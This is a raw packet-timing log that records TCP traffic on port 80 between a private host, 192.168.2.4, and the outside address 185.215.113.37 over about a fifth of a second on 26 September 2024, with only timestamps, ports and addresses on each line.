Sep 26, 2024 18:27:12.905213118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905217886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905230045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905245066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905257940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905272007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905275106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905286074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905306101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905308008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905320883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905333996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905334949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905349016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905364037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905364990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905371904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905386925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905395031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905405998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905419111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905432940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905447960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905453920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905453920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905462980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905477047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905481100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905492067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905533075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905567884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905894041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905950069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906213999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906263113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906265974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906299114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906311035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906332970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906352997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906366110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906385899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906398058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906411886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906430960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906436920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906464100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906485081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906496048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906524897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906528950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906542063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906562090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906579018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906594992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906615019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906627893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906646013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906687975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906689882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906724930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906745911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906755924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906785011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906788111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906811953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906820059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906835079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906852007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906867981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906888962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.906912088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.906938076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966612101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966628075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966641903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966655016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966666937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966679096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966691017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966692924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966705084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966731071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966758966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966783047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966790915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966804028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966810942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966815948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966828108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.966851950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.966902018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.968753099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968769073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968784094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968817949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.968888044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968889952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.968913078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968925953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968936920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.968936920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.968955040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.968981981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969458103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969474077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969489098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969511986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969559908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969567060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969577074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969592094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969605923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969643116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969643116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969692945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969774008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969788074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969801903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969816923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969827890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969831944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969847918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969849110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969863892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.969890118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.969918013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.008696079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.008761883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.008761883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.008799076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.008816004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.008855104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009109974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009161949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009161949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009196997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009215117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009241104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009246111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009294987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009298086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009327888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009344101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009377003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009378910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009409904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009424925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009443045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009457111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009475946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009490967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009507895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009541035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009545088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009563923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009574890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009588957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009625912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009655952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009686947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009706020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009720087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009746075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009752035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009761095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009784937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009798050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009819031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009843111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009869099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009887934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009901047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009933949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009934902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009963036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.009965897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.009985924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010004044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010018110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010063887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010237932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010288000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010416031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010447025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010469913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010479927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010495901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010513067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010530949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010545969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010564089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010579109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.010596037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.010626078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030224085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030273914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030294895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030334949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030348063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030384064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030596018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030630112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030648947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030667067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030678988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030702114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.030714035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.030751944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031064034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031095982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031126976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031143904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031147003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031181097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031199932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031214952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031228065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031248093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031275988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031280994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031295061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031313896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031327009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031359911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031377077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031424046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.031426907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.031476021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032040119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032090902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032090902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032125950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032139063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032164097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032180071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032181025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032212973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032217979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032227993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032241106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032247066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032253981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032258987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032258987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032273054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032291889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032305956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032330990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032341003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032381058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032393932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032399893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032407999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032423973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.032454014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.032474041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033337116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033369064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033389091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033404112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033418894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033448935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033448935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033482075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033507109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033514023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033534050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033546925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033556938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033586979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033591986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033600092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033612967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033624887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033637047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033638954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033652067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.033664942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033689022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.033721924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.034343004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.034372091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.034396887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.034416914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035697937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035731077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035762072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035765886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035794973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035804987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035829067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035855055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035861969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035882950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035895109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.035917997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.035943031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069006920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069068909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069083929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069091082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069139957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069232941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069248915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069263935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069278002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069281101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069319010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069354057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069370031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069385052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069401026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069406033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069417000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069426060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069432974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069448948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069463968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069473028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069488049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.069489002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069510937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.069545984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071330070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071345091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071358919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071373940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071376085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071398973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071404934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071410894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071410894 CEST	49730	80	192.168.2.4	185.215.113.37
